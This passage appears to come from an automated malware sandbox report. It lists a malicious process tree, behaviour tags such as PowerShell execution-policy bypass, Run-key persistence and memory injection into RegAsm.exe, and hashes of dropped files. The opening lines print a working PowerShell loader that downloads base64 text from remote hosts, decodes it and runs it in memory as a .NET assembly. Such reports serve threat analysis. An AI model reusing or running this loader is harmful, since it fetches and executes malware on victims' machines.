protected]/Upcrypter/02/DLL01.txt' );$wVPlu.dispose();$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$MWfua = $wVPlu.DownloadString( $MWfua );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $MWfua.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 
'22%9703cf44bd35a5c47462b7be829812f622%=v&daolnwod=ecruos&txt.4202.70.0372%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.70.0322%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.e45342427985-5e79-fc64-4548-097fa055/oQO2Lu0o/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'True1' ) );};"4⤵
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 4808
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft SyS\\x2.ps1"
          - Adds Run key to start application
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2688
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft SyS\isltf.ps1"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 4076
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            - System Location Discovery: System Language Discovery
            PID: 4360
        C:\Windows\system32\cmd.exe
          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"
          PID: 2448
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 132KB
MD5: c48ca9208d2d72f7c4aadc4552c4371c
SHA1: 009a66081262d0e7ac6d9654f4d19ffe8f7b9965
SHA256: 488da21024f08719000d1c44b00bf74fa4343eb1cccffb786efac08cba079fd5
SHA512: 404b0062421b807cace5d4ab37b8379373045fe57bb3a020b98484b56adc1096c929319194f190edba247959a8dce7c6097b393d6a811e75941ff586e9ac71e0

Filesize: 313B
MD5: b141032fc27557e652dbaf28bdd48dcf
SHA1: 733fa3581410a4d450b8dcfacf16ab74352b4453
SHA256: 6521823e3cc8a09664fd1db0c845d53a43d3253d69687b7c307d5e817d34ec0c
SHA512: b948bd78a7354aa4dc01eaf3e06ba72727b9ffbe462e405b5e7c788acd985a980bf7ef0ff5ea29b5e7e2834ffde88a4c19e12df0281239189dd16de5247f2b10

Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Filesize: 1KB
MD5: 641727f6e43739ea45e79725fc622ae3
SHA1: c9eb462c5739e508a25b99d603ae7dba3946a1f6
SHA256: 465fe52cdaadf696aac89d86337c39b60cbb0f3c98a8c1a12b0bfe8443bca80d
SHA512: b221135371df74d36994b47c0788a32d06b0ce5522127902f7cae083e4f6563736f56f0bb06113e452acf87e6a756f44fea522b5f0db75be1203c6a24bfada6a

Filesize: 64B
MD5: d255504cb22d7dce432c9ef4188f05a5
SHA1: c0b1ce40c879d98fd32bde7d397f26d38996427a
SHA256: c4870d8fb8553880c55e15cd646dda458c7299f0a9ad487a81941a1dbcf9de84
SHA512: d13c8e33dd42bb49f076e3a932bc634577ee9462ad9aa2ba26cc67243794b28342c6db59df5d07bc15c70f2cc0e36e29a8c564e6842bead382a1c9b46b0a7846

Filesize: 1KB
MD5: 6c4805e00673bef922d51b1a7137028f
SHA1: 0eabb38482d1733dd85a2af9c5342c2cafcd41eb
SHA256: 7af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd
SHA512: eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 12KB
MD5: 4e37cf7563ad5ebcde8bfcb51a515c48
SHA1: b9f758dd64b60da7da2f01b680d45abaf854f41e
SHA256: f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331
SHA512: 9f63413b1759b8c467a7aa146a12f709ce5a929a928f70ea00799b6246eab3d04afea884d78a87e23ab4cb5fcb8b51269d2a5221b0bb93f9cca7c3468d2359fe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize: 1KB
MD5: de36db977ed6368d6c2c772d2150d1eb
SHA1: b6cd0ca1d70097fe2b4a0ceff30d0626f3a64e29
SHA256: bd1e89e16a174c41aa3f8152602a79a5edc067587175bd6e93c1a916604a03a2
SHA512: fb8b623164930ed143ca51cf79283765a919f7b23475825465f3291f0914d552d97024c93dfdd2b3113e079d083807e6e1ac0f6d90d2264f376da7d69781c7a9